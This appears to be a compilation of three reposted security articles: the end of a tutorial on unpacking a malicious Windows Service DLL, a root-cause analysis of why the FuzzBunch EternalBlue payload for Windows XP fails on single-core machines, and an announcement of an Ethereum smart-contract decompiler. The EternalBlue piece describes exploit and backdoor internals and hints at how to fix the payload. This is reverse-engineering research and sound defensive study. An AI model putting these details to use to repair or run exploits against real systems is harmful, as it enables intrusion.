As there are a couple of XOR operations whose value is picked from register rsp+0x68 and after some manipulation data is written to [rbx+rsi*2] translate to the same address. We can verify this in dynamic analysis. I am at this point little suspicious that the executable is packed as not many functions were recognized by both IDA and radare2 analysis.

Let us have look at the disassembly of the ServiceMain.

These instruction doesn’t seem to make any sense. This further confirms our doubt of packed executable. We can use radare2 entropy calculation function to check the entropy if each segment in the execute. If there is any segment with high entropy then it means that section holds the encrypted data. We can use radare2 iS entropy command to calculate the entropy of each segment, below is the result of the command.

As you can clearly see that .text segment has very high entropy compared to other segments. This confirms our suspicious of packed executable. In the next sections, we will try to setups debugging environment for Service Application as it is not as straight forward as other windows application and extract the unpacked executable using dynamic analysis.

How to debug a Service Application DLL

If this would have been a normal DLL we could just used Immunity debugger to do debugging but Service Application DLL is different as they have to register themselves and declare their state as running within first few seconds of execution, and also before running the main entry point the Service Control Manager(SCM) should be aware that the Service is going to run and the DLL runs only in the context of the SCM.

So the challenge is that we cannot get hold of the DLL entry point with ad debugger. We could overcome this limitation if we could manage to pause the execution of the DLL entry point when the SCM run the DLL.

After doing some research I came across a technique called EBFE, you can read more about on this link. In this technique, we insert an infinite loop at the point we want to insert the breakpoint, once the thread executes this instruction it puts it in an infinite loop. EBFE is a jump instruction code which points to itself, this will put the executing thread in an infinite loop and then we all the time in the world to attach the debugger to the process and start debugging the process.

Next question is how will we know which subprocess spawned by SCM should we attach the debugger to? It’s actually very simple, once the CPU executes the infinite loop instruction the CPU consumption value will rise to very high-value something like 90-100%. We can use process explorer one of the System Internal tools to get the process ID of the process.

As you can see in the image above once the CPU executes EBFE instruction it goes in an infinite loop which increases the CPU consumption to 95-100% which is the indicator that our process is ready to be attached.

Now that we have figured out how to attach the debugger to _Service Application _, next thing is we have to place this instruction at a point which will get executed which is the entry point of the DLL. There are two points of interest at which we are can place EBFE are, ServiceMain(Service entry point) and DllEntry (DLL entry point). We will place this EBFE instruction on both of these functions. Before replacing the two-byte instruction you will have to take note of the original two bytes which you are replacing. Once the hit the infinite loop we will replace it with the original bytes and continue debugging.

Dynamically unpacking the packed code

Let us start with analyzing DllEntry point since out of those two functions only this function had some sensible code.

First, the memory is allocated for the size of the original executable, the way it allocates the memory is something weird, it specifies the base address of memory block it wants to allocate, if it fails then it iterates from 100000h at the interval of 10000h tries to allocate the memory. We will have to not down this address as the unpacked executable will be on this address.

then it changes the memory permission of the allocated memory and copies each segment (.text, .rdata, ) to newly allocated memory.

then it patches the current DLL entry point with the DllEntry point function in unpacked code. Before patching the memory address it changes the memory permission to writable then restore it back to Read and Execute.

It then iterates the Import Address Table(IAT) of the unpacked DLL and it loads the DLL present in the IAT and resolves the imported functions and patches it in the table.

this is the stage at with code is unpacked and the IAT is resolved next the code jump to the original DllEntry point for execution.

Dumping the unpacked code

The memory address which we noted earlier in the address at which the executable is unpacked as you can see in the dump below.

We will use Scylla plugin which built-in in X64-dbg to dump the executable. You will have to specify the base address of the executable and the size of memory you want to use to recover the PE which you can see from the memory panel next to the address column and size of the debugger which is 23000 in our case and click the dump PE to save the executable file.

Unpacked Binary

Unpacked binary basic information is as shown below

Import section of the unpacked binary

Some more of the import section which shows binary uses HTTP for communication with the C&C

We can see the registering of the service in ServiceMain function by calling RegisterServiceCtrlHandleWand SetServiceStatus, that means we can be sure it was indeed as Service Application.

Conclusion

We managed to unpack the Service Application DLL, this packer was specially designed DLLs was we observed the unpacking of the binary as then patching of the DllEntry point to the original code. It was not a special anti-debug technique used in unpacking which made it very trivial which good to learn for a beginner. We also learnt how to dump in-memory binary along the way.

Reference

  1. Creating Windows Service Application in C++
  2. Windows Service Application MSDN
  3. Debugging Remote Thread with EBFE technique

Dissecting a Bug in the EternalBlue Client for Windows XP (FuzzBunch)

( Original text by zerosum0x0 )

 

Background

Pwning Windows 7 was no problem, but I would re-visit the EternalBlue exploit against Windows XP for a time and it never seemed to work. I tried all levels of patching and service packs, but the exploit would either always passively fail to work or blue-screen the machine. I moved on from it, because there was so much more of FuzzBunch that was unexplored.

Well, one day on a pentest a wild Windows XP appeared, and I figured I would give FuzzBunch a go. To my surprise, it worked! And on the first try.

Why did this exploit work in the wild but not against runs in my «lab»?

tl;dr: Differences in NT/HAL between single-core/multi-core/PAE CPU installs causes FuzzBunch’s XP payload to abort prematurely on single-core installs.

Multiple Exploit Chains

Keep in mind that there are several versions of EternalBlue. The Windows 7 kernel exploit has been well documented. There are also ports to Windows 10 which have been documented by myself and JennaMagius as well as sleepya_.

But FuzzBunch includes a completely different exploit chain for Windows XP, which cannot use the same basic primitives (i.e. SMB2 and SrvNet.sys do not exist yet!). I discussed this version in depth at DerbyCon 8.0 (slides / video).

tl;dw: The boot processor KPCR is static on Windows XP, and to gain shellcode execution the value of KPRCB.PROCESSOR_POWER_STATE.IdleFunction is overwritten.

Payload Methodology

As it turns out, the exploit was working just fine in the lab. What was failing was FuzzBunch’s payload.

The main stages of the ring 0 shellcode performs the following actions:

  1. Obtains &nt and &hal using the now-defunct KdVersionBlock trick
  2. Resolves some necessary function pointers, such as hal!HalInitializeProcessor
  3. Restores the boot processor KPCR/KPRCB which was corrupted during exploitation
  4. Runs DoublePulsar to backdoor the SMB service
  5. Gracefully resumes execution at a normal state (nt!PopProcessorIdle)

Single Core Branch Anomaly

Setting a couple hardware breakpoints on the IdleFunction switch and +0x170 into the shellcode (after a couple initial XOR/Base64 shellcode decoder stages), it is observed that a multi-core machine install branches differently than the single-core machine.

1 kd> ba w 1 ffdffc50 "ba e 1 poi(ffdffc50)+0x170;g;"

The multi-core machine has acquired a function pointer to hal!HalInitializeProcessor.

Presumably, this function will be called to clean up the semi-corrupted KPRCB.

The single-core machine did not find hal!HalInitializeProcessor… sub_547 instead returned NULL. The payload cannot continue, and will now self destruct by zeroing as much of itself out as it can and set up a ROP chain to free some memory and resume execution.

Note: A successful shellcode execution will perform this action as well, just after installing DoublePulsar first.

Root Cause Analysis

The shellcode function sub_547 does not properly find hal!HalInitializeProcessor on single core CPU installs, and thus the entire payload is forced to abruptly abort. We will need to reverse engineer the shellcode function to figure out exactly why the payload is failing.

There is an issue in the kernel shellcode that does not take into account all of the different types of the NT kernel executables are available for Windows XP. Specifically, the multi-core processor version of NT works fine (i.e. ntkrnlamp.exe), but a single core install (i.e. ntoskrnl.exe) will fail. Likewise, there is a similar difference in halmacpi.dll vs halacpi.dll.

The NT Red Herring

The first operation that sub_547 performs is to obtain HAL function imports used by the NT executive. It finds HAL functions by first reading at offset 0x1040 into NT.

On multi-core installs of Windows XP, this offset works as intended, and the shellcode finds hal!HalQueryRealTimeClock:

However, on single-core installations this is not a HAL import table, but instead a string table:

At first I figured this was probably the root cause. But it is a red herring, as there is correction code. The shellcode will check if the value at 0x1040 is an address in the range within HAL. If not it will subtract 0xc40 and start searching in increments of 0x40 for an address within the HAL range, until it reaches 0x1040 again.

Eventually, the single-core version will find a HAL function, this time hal!HalCalibratePerformanceCounter:

This all checks out and is fine, and shows that Equation Group did a good job here for determining different types of XP NT.

HAL Variation Byte Table

Now that a function within HAL has been found, the shellcode will attempt to locate hal!HalInitializeProcessor. It does so by carrying around a table (at shellcode offset 0x5e7) that contains a 1-byte length field followed by an expected sequence of bytes. The original discovered HAL function address is incremented in search of those bytes within the first 0x20 bytes of a new function.

The desired 5 bytes are easily found in the multi-core version of HAL:

However, the function on single-core HAL is much different.

There is a similar mov instruction, but it is not a movzx. The byte sequence being searched for is not present in this function, and consequently the function is not discovered.

Conclusion

It is well known (from many flame wars on Windows kernel development mailing lists) that searching for byte sequences to identify functions is unreliable across different versions and service packs of Windows. We have learned from this bug that exploit developers must also be careful to account for differences in single/multi-core and PAE variations of NTOSKRNL and HAL. In this case, the compiler decided to change one movzx instruction to a mov instruction and broke the entire payload.

It is very curious that the KdVersionBlock trick and a byte sequence search is used to find functions in this payload. The Windows 7 payload finds NT and its exports in, as seen, a more reliable way, by searching backwards in memory from the KPCR IDT and then parsing PE headers.

This HAL function can be found through such other means (it appears readily exported by HAL). The corrupted KPCR can also be cleaned up in other ways. But those are both exercises for the reader.

There is circumstantial evidence that primary FuzzBunch development was started in late 2001. The payload seems maybe it was only written for and tested against multi-core processors? Perhaps this could be a indicator as to how recent the XP exploit was first written. Windows XP was broadly released on October 25, 2001. While this is the same year that IBM invented the first dual-core processor (POWER4), Intel and AMD would not have a similar offering until 2004 and 2005, respectively.

This is yet another example of the evolution of these ETERNAL exploits. The Equation Group could have re-used the same exploit and payload primitives, yet chose to develop them using many different methodologies, perhaps so if one methodology was burned they could continue to reap the benefits of their exploit diversification. There is much esoteric Windows kernel internals knowledge that can be learned from studying these exploits.

ETHEREUM SMART CONTRACT DECOMPILER

( Original text by  )

We’re very excited to announce that the pre-release of our Ethereum smart contract decompiler is available. We hope that it will become a tool of choice for security auditors, vulnerability researchers, and reverse engineers examining opaque smart contracts running on Ethereum platforms.

TL;DR: Download the demo build and start reversing contracts

Keep on reading to learn about the current features of the decompiler; how to use it and understand its output; its current limitations, and planned additions.

This opaque multisig wallet is holding more than USD $22 million as of 10/26/2018 (on mainnet, address 0x3DBB3E8A5B1E9DF522A441FFB8464F57798714B1)

Overall decompiler features

The decompiler modules provide the following specific capabilities:

  • The decompiler takes compiled smart contract EVM 1 code as input, and decompiles them to Solidity-like source code.
  • The initial EVM code analysis passes determine contract’s public and private methods, including implementations of public methods synthetically generated by compilers.
  • Code analysis attempts to determine method and event names and prototypes, without access to an ABI.
  • The decompiler also attempts to recover various high-level constructs, including:
    • Implementations of well-known interfaces, such as ERC20 for standard tokens, ERC721 for non-fungible tokens, MultiSigWallet contracts, etc.
    • Storage variables and types
    • High-level Solidity artifacts and idioms, including:
      • Function mutability attributes
      • Function payability state
      • Event emission, including event name
      • Invocations of address.send() or address.transfer()
      • Precompiled contracts invocations

On top of the above, the JEB back-end and client platform provide the following standard functionality:

  • The decompiler uses JEB’s optimizations pipeline to produce high-level clean code.
  • It uses JEB code analysis core features, and therefore permits: code refactoring (eg, consistently renaming methods or fields), commenting and annotating, navigating (eg, cross references), typing, graphing, etc.
  • Users have access to the intermediate-level IR representation as well as high-level AST representations though the JEB API.
  • More generally, the API allows power-users to write extensions, ranging from simple scripts in Python to complex plugins in Java.

Our Ethereum modules were tested on thousands of smart contracts active on Ethereum mainnet and testnets.

Basic usage

Open a contract via the “File, Open smart contract…” menu entry.

You will be offered two options:

  • Open a binary file already stored on disk
  • Download 2 and open a contract from one of the principal Ethereum networks: mainnetrinkebyropsten, or kovan:
    • Select the network
    • Provide the contract 20-byte address
    • Click Download and select a file destination
Open a contract via the File, Open smart contract menu entry

Note that to be recognized as EVM code, a file must:

  • either have a “.evm-bytecode” extension: in this case, the file may contain binary or hex-encoded code;
  • or have be a “.runtime” or “.bin-runtime” extension (as generated by the solc Solidity compiler), and contain hex-encoded Solidity generated code.

If you are opening raw files, we recommend you append the “.evm-extension” to them in order to guarantee that they will be processed as EVM contract code.

Contract Processing

JEB will process your contract file and generate a DecompiledContract class item to represent it:

The Assembly view on the right panel shows the processed code.

To switch to the decompiled view, select the “Decompiled Contract” node in the Hierarchy view, and press TAB (or right-click, Decompile).

Right-click on items to bring up context menus showing the principal commands and shortcuts.
The decompiled view of a contract.

The decompiled contract is rendered in Solidity-like code: it is mostly Solidity code, but not entirely; constructs that are illegal in Solidity are used throughout the code to represent instructions that the decompiler could not represent otherwise. Examples include: low-level statements representing some low-level EVM instructions, memory accesses, or very rarely, goto statements. Do not expect a DecompiledContract to be easily recompiled.

Code views

You may adjust the View panels to have side-by-side views if you wish to navigate the assembly and high-level code at the same time.

  • In the assembly view, within a routine, press Space to visualize its control flow graph.
  • To navigate from assembly to source, and back, press the TAB key. The caret will be positioned on the closest matching instruction.
Side by side views: assembly and source

Contract information

In the Project Explorer panel, double click the contract node (the node with the official Ethereum Foundation logo), and then select the Description tab in the opened view to see interesting information about the processed contract, such as:

  • The detected compiler and/or its version (currently supported are variants of Solidity and Vyper compilers).
  • The list of detected routines (private and public, with their hashes).
  • The Swarm hash of the metadata file, if any.
The contract was identified as being compiled with Solidity <= 0.4.21

Commands

The usual commands can be used to refactor and annotate the assembly or decompiled code. You will find the exhaustive list in the Action and Native menus. Here are basic commands:

  • Rename items (methods, variables, globals, …) using the N key
  • Navigate the code by examining cross-references, using the X key (eg, find all callers of a method and jump to one of them)
  • Comment using the Slash key
  • As said earlier, the TAB key is useful to navigate back and forth from the low-level EVM code to high-level decompiled code

We recommend you to browser the general user manual to get up to speed on how to use JEB.

Rename an item (eg, a variable) by pressing the N key

Remember that you can change immediate number bases and rendering by using the B key. In the example below, you can see a couple of strings present in the bad Fomo3D contract, initially rendered in Hex:

All immediates are rendered as hex-strings by default.
Use the B key to cycle through base (10, 16, etc.) and rendering (number, ascii)

Understanding decompiled contracts

This section highlights idioms you will encounter throughout decompiled pseudo-Solidity code. The examples below show the JEB UI Client with an assembly on the left side, and high level decompiled code on the right side. The contracts used as examples are live contracts currently active Ethereum mainnet.

We also highlight current limitations and planned additions.

Dispatcher and public functions

The entry-point function of a contract, at address 0, is generally its dispatcher. It is named start() by JEB, and in most cases will consist in an if-statement comparing the input calldata hash (the first 4 bytes) to pre-calculated hashes, to determine which routine is to be executed.

  • JEB attempts to determine public method names by using a hash dictionary (currently containing more than 140,000 entries).
  • Contracts compiled by Solidity generally use synthetic (compiler generated) methods as bridges between public routines, that use the public Ethereum ABI, and internal routines, using a compiler-specific ABI. Those routines are identified as well and, if their corresponding public method was named, will be assigned a similar name __impl_{PUBLIC_NAME}.

NOTE/PLANNED ADDITION: currently, JEB does not attempt to process input data of public routines and massage it back into an explicit prototype with regular variables. Therefore, you will see low-level access to CALLDATA bytes within public methods.

A dispatcher.

Below, see the public method collectToken(), which is retrieving its first parameter – a 20 byte address – from the calldata.

A public method reading its arguments from CALLDATA bytes.

Interface discovery

At the time of writing, implementation of the following interfaces can be detected: ERC20, ERC165, ERC721, ERC721TokenReceiver, ERC721Metadata, ERC721Enumerable, ERC820, ERC223, ERC777, TokenFallback used by ERC223/ERC777 interfaces, as well as the common MultiSigWallet interface.

Eg, the contract below was identified as an ERC20 token implementation:

This contract implements all methods specified by the ERC20 interface.

Function attributes

JEB does its best to retrieve:

  • low-level state mutability attributes (pure, read-only, read-write)
  • the high-level Solidity ‘payable’ attribute, reserved for public methods

Explicitly non-payable functions have lower-level synthetic stubs that verify that no Ether is being received. They REVERT if it is is the case. If JEB decides to remove this stub, the function will always have an inline comment /* non payable */ to avoid any ambiguity.

The contract below shows two public methods, one has a default mutability state (non-payable); the other one is payable. (Note that the hash 0xFF03AD56 was not resolved, therefore the name of the method is unknown and was set to sub_AF; you may also see a call to the collect()’s bridge function __impl_collect(), as was mentioned in the previous section).

Two public methods, one is payable, the other is not and will revert if it receives Ether.

Storage variables

The pre-release decompiler ships with a limited storage reconstructor module.

  • Accesses to primitives (int8 to int256, uint8 to uint256) is reconstructed in most cases
  • Packed small primitives in storage words are extracted (eg, a 256-bit storage word containing 2x uint8 and 1x int32, and accessed as such throughout the code, will yield 3 contract variables, as one would expect to see in a Solidity contract
Four primitive storage variables were reconstructed.

However, currently, accesses to complex storage variables, such as mappings, mappings of mappings, mappings of structures, etc. are not simplified. This limitation will be addressed in the full release.

When a storage variable is not resolved, you will see simple “storage[…]” assignments, such as:

Unresolved storage assignment, here, to a mapping.

Due to how storage on Ethereum is designed (a key-value store of uint256 to uint256), Solidity internally uses a two-or-more indirection level for computing actual storage keys. Those low-level storage keys depend on the position of the high level storage variables. The KECCAK256 opcode is used to calculate intermediate and final keys. We will detail this mechanism in detail in a future blog post.

Precompiled contracts

Ethereum defines four pre-compiled contracts at addresses 1, 2, 3, 4. (Other addresses (5-8) are being reserved for additional pre-compiled contracts, but this is still at the ERC stage.)

JEB identifies CALLs that will eventually lead to pre-compiled code execution, and marks them as such in decompiled code: call_{specific}.

The example below shows the __impl_Receive (named recovered) method of the 34C3 CTF contract, which calls into address #2, a pre-compiled contract providing a fast implementation of SHA-256.

This contract calls address 2 to calculate the SHA-256 of a binary blob.

Ether send()

Solidity’s send can be translated into a lower-level call with a standard gas stipend and zero parameters. It is essentially used to send Ether to a contract through the target contract fallback function.

NOTE: Currently, JEB renders them as send(address, amount) instead of address.send(amount)

The contract below is live on mainnet. It is a simple forwarder, that does not store ether: it forwards the received amount to another contract.

This contract makes use of address.send(…) to send Ether

Ether transfer()

Solidity’s transfer is an even higher-level variant of send that checks and REVERTs with data if CALL failed. JEB identifies those calls as well.

NOTE: Currently, JEB renders them as transfer(address, amount) instead of address.transfer(amount)

This contract makes use of address.transfer(…) to send Ether

Event emission

JEB attempts to partially reconstruct LOGx (x in 1..4) opcodes back into high-level Solidity “emit Event(…)”. The event name is resolved by reversing the Event method prototype hash. At the time of writing, our dictionary contains more than 20,000 entries.

If JEB cannot reverse a LOGx instruction, or if LOG0 is used, then a lower-level log(…) call will be used.

NOTE: currently, the event parameters are not processed; therefore, the emit construct used in the decompiled code has the following form: emit Event(memory, size[, topic2[, topic3[, topic4]]]). topic1 is always used to store the event prototype hash.

An Invocation of LOG4 reversed to an “emit Deposit(…)” event emission

API

JEB API allows automation of complex or repetitive tasks. Back-end plugins or complex scripts can be written in Python or Java. The API update that ship with JEB 3.0-beta.6 allow users to query decompiled contract code:

  • access to the intermediate representation (IR)
  • access to the final Solidity-like representation (AST)

API use is out-of-scope here. We will provide examples either in a subsequent blog post or on our public GitHub repository.

Conclusion

As said in the introduction, if you are reverse engineering opaque contracts (that is, most contracts on Ethereum’s mainnet), we believe you will find JEB useful.

You may give a try to the pre-release by downloading the demo here. Please let us know your feedback: we are planning a full release before the end of the year.

As always, thank you to all our users and supporters. -Nicolas

  1. EVM: Ethereum Virtual Machine 
  2. This Open plugin uses Etherscan to retrieve the contract code